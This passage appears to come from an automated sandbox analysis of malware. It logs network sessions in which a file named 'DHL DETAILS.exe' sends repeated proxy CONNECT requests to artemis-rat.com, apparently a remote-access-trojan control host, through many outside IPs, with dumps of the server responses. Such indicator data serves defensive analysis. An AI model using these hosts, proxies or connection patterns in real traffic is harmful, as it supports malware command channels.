                                                                                    115192.168.2.55050543.157.50.2064436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.761940956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    116192.168.2.550233134.209.189.42806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.761941910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.055193901 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    117192.168.2.55051143.157.50.2064436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.763672113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    118192.168.2.55021645.120.178.19710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.777585983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    119192.168.2.55052443.157.50.2064436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.782001019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    120192.168.2.550188190.128.228.182806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.782056093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.520600080 CET1286INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: Apache/2.4.56 (Ubuntu)
                                                                                    Set-Cookie: PHPSESSID=7rcj09ngv03o7t0609hc2sb31e; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    Vary: Accept-Encoding
                                                                                    Content-Length: 5101
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 69 6d 67 2f 66 75 74 75 72 61 2e 70 6e 67 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 55 54 55 52 41 31 30 30 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 20 46 6f 6e 74 66 61 63 65 73 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 66 6f 6e 74 2d 66 61 63 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2d 35 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 21 2d 2d 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 6d 64 69 2d 66 6f 6e 74 2f 63 73 73 2f 6d 61 74 65 72 69 61 6c 2d 64 65 73 69 67 6e 2d 69 63 6f 6e 69 63 2d 66 6f 6e 74 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 42 6f 6f 74 73 74 72 61 70 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 73 74 61 74 69 63 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 0d 0a 3c 21 2d 2d 20 63 6f 64 69 67 6f 73 20 43 53 53 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 61 6e 69 6d 73 69 74 69 6f 6e 2f 61 6e 69 6d 73 69 74 69 6f 6e 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 6f 64 69 67 6f 73 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2f 70 65 72 66 65 63 74 2d 73 63 72 6f 6c 6c 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <link rel="icon" href="static/src/img/futura.png"> <title>FUTURA100</title><link href="css/style.css" rel="stylesheet" media="all">... Fontfaces CSS--><link href="css/font-face.css" rel="stylesheet" media="all"><link href="codigos/font-awesome-5/css/fontawesome-all.min.css" rel="stylesheet" media="all">...<link href="codigos/mdi-font/css/material-design-iconic-font.min.css" rel="stylesheet" media="all">-->... Bootstrap CSS--><link href="static/lib/css/bootstrap/bootstrap.css" rel="stylesheet" media="all">... codigos CSS<link href="codigos/animsition/animsition.min.css" rel="stylesheet" media="all"><link href="codigos/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet" media="all">-->...
                                                                                    Mar 9, 2024 13:14:13.520694971 CET1286INData Raw: 20 4d 61 69 6e 20 43 53 53 2d 2d 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 74 6f 75 72 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22
                                                                                    Data Ascii: Main CSS--><link href="css/bootstrap-tour.min.css" rel="stylesheet" media="all"><link href="css/bootstrap-tour-standalone.css" rel="stylesheet" media="all"><link href="css/theme.css" rel="stylesheet" media="all"><link rel="stylesh
                                                                                    Mar 9, 2024 13:14:13.520808935 CET1286INData Raw: 74 72 61 70 2d 74 6f 75 72 2d 30 2e 31 32 2e 30 2f 72 65 74 69 6e 61 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63
                                                                                    Data Ascii: trap-tour-0.12.0/retina.min.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/xlsx/0.18.5/xlsx.full.min.js" integrity="sha512-r22gChDnGvBylk90+2e/ycr3RVrDi8DIOkIGNhJlKfuyQM4tIRAI062MaV8sfjQKYVGjOBaZBOA87z+IhZE9DA==" crossorigi
                                                                                    Mar 9, 2024 13:14:13.520999908 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 94 58 99 67 6f ce 45 58 ca 12 b8 7f e2 b8 c5 da 49 1b 18 74 ee cf 45 b7 b8 38 5e 52 0e 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheRXgoEXItE8^R*,+0/$#('=<5/artemis-rat.com#+r8]sB':pnC.6r,`bgeZ'FHMe8ax
                                                                                    Mar 9, 2024 13:14:13.521101952 CET1286INData Raw: 69 c3 b3 6e 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e
                                                                                    Data Ascii: in</button> </div> </div> </div> </div> <div class="p-3 d-flex justify-content-center mt-5" style="background-color: rgba(0, 0, 0, -0.9);width: 400px; margin-left:auto;margin-r
                                                                                    Mar 9, 2024 13:14:13.521120071 CET298INData Raw: 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 73 74 61 74 69 63 2f 73 72 63 2f 6a 73 2f 6c 6f 67 69
                                                                                    Data Ascii: <script src="static/src/js/main.js"></script> <script src="static/src/js/login.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootstrap-tour.min.js"></script> <script src="static/lib/js/bootstrap-tour-0.12.0/bootst
                                                                                    Mar 9, 2024 13:14:13.878740072 CET494INHTTP/1.1 400 Bad Request
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Server: Apache/2.4.56 (Ubuntu)
                                                                                    Content-Length: 312
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 67 72 2e 66 75 74 75 72 61 31 30 30 2e 63 6f 6d 2e 70 79 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Ubuntu) Server at agr.futura100.com.py Port 80</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    121192.168.2.550328198.199.86.1180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.791537046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.719146013 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    122192.168.2.550214103.23.100.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.793338060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.504947901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    123192.168.2.55024043.131.248.165156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.796854973 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    124192.168.2.55056545.144.30.2324436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.799683094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    125192.168.2.550340147.182.180.242806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.799982071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    126192.168.2.55056745.144.30.2324436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.800901890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    127192.168.2.55057045.144.30.2324436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.803358078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    128192.168.2.55057245.144.30.2324436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.804105043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    129192.168.2.550308184.178.172.1441456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.807326078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    130192.168.2.550273119.196.168.183806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.811285019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    131192.168.2.55036251.222.241.15757176352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.813900948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.348705053 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.036199093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.473941088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    132192.168.2.55014590.188.250.16806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.819938898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    133192.168.2.55024331.148.207.153806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.825259924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.159621000 CET340INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.2
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    134192.168.2.55058743.157.32.2304436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.825261116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    135192.168.2.55025043.155.130.182156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.826730013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    136192.168.2.55059143.157.32.2304436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.826730013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    137192.168.2.55059243.157.32.2304436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.828696966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    138192.168.2.550336174.64.199.8241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.830874920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    139192.168.2.55059843.157.32.2304436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.831099987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
